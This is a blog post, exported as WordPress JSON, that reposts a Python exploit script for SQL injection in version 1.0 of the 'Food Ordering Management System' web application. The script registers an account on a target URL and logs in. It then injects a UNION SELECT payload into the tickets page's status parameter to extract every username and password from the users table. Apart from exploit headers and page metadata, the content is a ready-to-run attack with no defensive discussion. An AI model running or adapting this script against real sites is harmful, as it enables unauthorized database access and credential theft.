# Exploit Title: Food Ordering Management System – SQL Injection
\n# Google Dork: N\/A
\n# Date: 2022-9-27
\n# Exploit Author: yousef alraddadi – https:\/\/twitter.com\/y0usef_11
\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15689\/food-ordering-management-system-php-and-mysql-free-source-code.html
\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/foms.zip
\n# Tested on: windows 11 – XAMPP
\n# CVE : N\/A
\n# Version: 1.0<\/p>\n
#\/usr\/bin\/python3<\/p>\n
import requests
\nimport os
\nimport sys
\nimport time
\nimport random
\nfrom bs4 import BeautifulSoup<\/p>\n
# clean screen
\nos.system(“cls”)
\nos.system(“clear”)<\/p>\n
logo = ”’
\n##################################################################
\n# #
\n# SQL injection (Food Ordering Management System) #
\n# #
\n##################################################################
\n”’
\nprint(logo)<\/p>\n
url = str(input(“Enter website url => “))
\nusername = str(input(“Enter Username => : “))
\nname = (“test123456”)
\npassword = (“test123456”)
\nphone = (“4511233199”)
\nnumber = (“1234567891000000”)
\ncvv = (“444”)<\/p>\n
req = requests.Session()<\/p>\n
regsiter_page = (url+”\/foms\/routers\/register-router.php”)
\nregsiter = {‘username’:username,’name’:name,’password’:password,’phone’:phone,’number’:number,’cvv’:cvv}
\nreq_regsiter = req.post(regsiter_page,data=regsiter)
\nprint(“[+] Regsiter Successfully”)<\/p>\n
login = {‘username’:username,’password’:password}
\nlogin_page = (url+”\/foms\/routers\/router.php”)
\nreq_login = req.post(login_page,data=login)
\nprint(“[+] Login Successfully”)<\/p>\n
sql = req.get(url+”\/foms\/tickets.php?status=Open’ union select 1,2,username,4,password,6,7,8 from users– -“)
\ntext = sql.text
\nsoup = BeautifulSoup(text,”html.parser”)<\/p>\n
print(“[+] SQL Injction Get Users and Password from table Users”)
\nfor link in soup.findAll(True, {‘class’:[‘task-cat light-blue’, ‘collections-title’]}):
\ntime.sleep(0.2)
\nprint(link.get)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Food Ordering Management System – SQL Injection # Google Dork: N\/A # Date: 2022-9-27 # Exploit Author: yousef alraddadi – https:\/\/twitter.com\/y0usef_11 # Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15689\/food-ordering-management-system-php-and-mysql-free-source-code.html # Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/foms.zip # Tested on: windows 11 – XAMPP # CVE : N\/A # Version: 1.0 #\/usr\/bin\/python3 import requests import os import sys import time …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31151","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31151"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151\/revisions"}],"predecessor-version":[{"id":31172,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151\/revisions\/31172"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}